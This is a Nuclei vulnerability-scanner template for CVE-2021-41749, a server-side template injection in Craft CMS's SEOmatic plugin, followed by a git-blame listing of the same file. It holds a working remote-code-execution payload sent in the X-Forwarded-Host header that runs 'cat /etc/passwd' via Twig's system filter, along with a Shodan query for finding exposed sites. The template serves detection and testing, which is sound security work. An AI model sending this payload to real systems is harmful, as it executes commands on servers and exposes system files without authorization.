nuclei-templates/http/cves/2021/CVE-2021-41749.yaml

id: CVE-2021-41749

info:
  name: CraftCMS SEOmatic - Server-Side Template Injection
  author: iamnoooob,ritikchaddha
  severity: critical
  description: |
    In the SEOmatic plugin up to 3.4.11 for Craft CMS 3, it is possible for unauthenticated attackers to perform a Server-Side. Template Injection, allowing for remote code execution.
  reference:
    - https://github.com/nystudio107/craft-seomatic/commit/3fee7d50147cdf3f999cfc1e04cbc3fb3d9f2f7d
    - https://nvd.nist.gov/vuln/detail/CVE-2021-41749
    - https://github.com/nystudio107/craft-seomatic/blob/develop/CHANGELOG.md
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-41749
    cwe-id: CWE-94
    epss-score: 0.46254
    epss-percentile: 0.97078
    cpe: cpe:2.3:a:nystudio107:seomatic:*:*:*:*:*:craft_cms:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: nystudio107
    product: seomatic
    framework: craft_cms
    shodan-query: 'X-Powered-By: Craft CMS html:"SEOmatic"'
  tags: cve,cve2021,craftcms,cms,ssti
variables:
  num1: "{{rand_int(40000, 44800)}}"
  num2: "{{rand_int(40000, 44800)}}"
  result: "{{to_number(num1)*to_number(num2)}}"
  marker: "{{randstr}}"

http:
  - raw:
      - |+
        GET / HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded-Host: {{Hostname}}/{{marker}}{{{{num1}}*{{num2}}}}
        Cache-Control: max-age=0

      - |+
        GET / HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded-Host: xxx{{['cat /etc/passwd']|filter('system')}}bbb
        Cache-Control: max-age=0

    skip-variables-check: true
    stop-at-first-match: true
    redirects: true
    max-redirects: 2
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_1, "/{{marker}}{{result}}") || regex("root:.*:0:0:", body_2)'
          - 'contains_any(body, "Craft CMS", "SEOmatic" ,"CRAFT_CSRF")'
          - 'status_code == 200'
        condition: and
# digest: 490a0046304402203e7ed489ed44dbaf94282ae2b22ff831afb32e7fedc10b06aa445ecd91ac653802202e3fd014457cffd465c17a035306d3f49f3ba9ac5b84ccdbebdc4e0fd9db0dd2:922c64590222798bb761d5b6d8e72950
Added CraftCMS SEOMatic Plugin SSTI 2023-10-12 10:53:59 +00:00			`id: CVE-2021-41749`

			`info:`
			`name: CraftCMS SEOmatic - Server-Side Template Injection`
Update CVE-2021-41749.yaml 2023-10-12 11:04:02 +00:00			`author: iamnoooob,ritikchaddha`
Added CraftCMS SEOMatic Plugin SSTI 2023-10-12 10:53:59 +00:00			`severity: critical`
			`description: \|`
Update CVE-2021-41749.yaml 2023-10-12 11:04:02 +00:00			`In the SEOmatic plugin up to 3.4.11 for Craft CMS 3, it is possible for unauthenticated attackers to perform a Server-Side. Template Injection, allowing for remote code execution.`
Added CraftCMS SEOMatic Plugin SSTI 2023-10-12 10:53:59 +00:00			`reference:`
			`- https://github.com/nystudio107/craft-seomatic/commit/3fee7d50147cdf3f999cfc1e04cbc3fb3d9f2f7d`
			`- https://nvd.nist.gov/vuln/detail/CVE-2021-41749`
templateman update 2023-10-14 11:27:55 +00:00			`- https://github.com/nystudio107/craft-seomatic/blob/develop/CHANGELOG.md`
Added CraftCMS SEOMatic Plugin SSTI 2023-10-12 10:53:59 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
templateman update 2023-10-14 11:27:55 +00:00			`cve-id: CVE-2021-41749`
Added CraftCMS SEOMatic Plugin SSTI 2023-10-12 10:53:59 +00:00			`cwe-id: CWE-94`
TemplateMan Update [Mon Nov 27 09:19:41 UTC 2023] :robot: 2023-11-27 09:19:41 +00:00			`epss-score: 0.46254`
			`epss-percentile: 0.97078`
templateman update 2023-10-14 11:27:55 +00:00			`cpe: cpe:2.3:a:nystudio107:seomatic::::::craft_cms::*`
Added CraftCMS SEOMatic Plugin SSTI 2023-10-12 10:53:59 +00:00			`metadata:`
			`verified: true`
templateman update 2023-10-14 11:27:55 +00:00			`max-request: 2`
			`vendor: nystudio107`
			`product: seomatic`
			`framework: craft_cms`
Added CraftCMS SEOMatic Plugin SSTI 2023-10-12 10:53:59 +00:00			`shodan-query: 'X-Powered-By: Craft CMS html:"SEOmatic"'`
			`tags: cve,cve2021,craftcms,cms,ssti`
			`variables:`
			`num1: "{{rand_int(40000, 44800)}}"`
			`num2: "{{rand_int(40000, 44800)}}"`
			`result: "{{to_number(num1)*to_number(num2)}}"`
			`marker: "{{randstr}}"`

			`http:`
			`- raw:`
			`- \|+`
			`GET / HTTP/1.1`
			`Host: {{Hostname}}`
			`X-Forwarded-Host: {{Hostname}}/{{marker}}{{{{num1}}*{{num2}}}}`
			`Cache-Control: max-age=0`

			`- \|+`
			`GET / HTTP/1.1`
			`Host: {{Hostname}}`
			`X-Forwarded-Host: xxx{{['cat /etc/passwd']\|filter('system')}}bbb`
			`Cache-Control: max-age=0`

Update CVE-2021-41749.yaml 2023-10-12 11:04:02 +00:00			`skip-variables-check: true`
Added CraftCMS SEOMatic Plugin SSTI 2023-10-12 10:53:59 +00:00			`stop-at-first-match: true`
			`redirects: true`
			`max-redirects: 2`
			`matchers:`
update matcher 2023-10-13 08:28:39 +00:00			`- type: dsl`
			`dsl:`
			`- 'contains(body_1, "/{{marker}}{{result}}") \|\| regex("root:.*:0:0:", body_2)'`
			`- 'contains_any(body, "Craft CMS", "SEOmatic" ,"CRAFT_CSRF")'`
			`- 'status_code == 200'`
			`condition: and`
Auto Template Signing [Mon Nov 27 10:10:24 UTC 2023] :robot: 2023-11-27 10:10:24 +00:00			`# digest: 490a0046304402203e7ed489ed44dbaf94282ae2b22ff831afb32e7fedc10b06aa445ecd91ac653802202e3fd014457cffd465c17a035306d3f49f3ba9ac5b84ccdbebdc4e0fd9db0dd2:922c64590222798bb761d5b6d8e72950`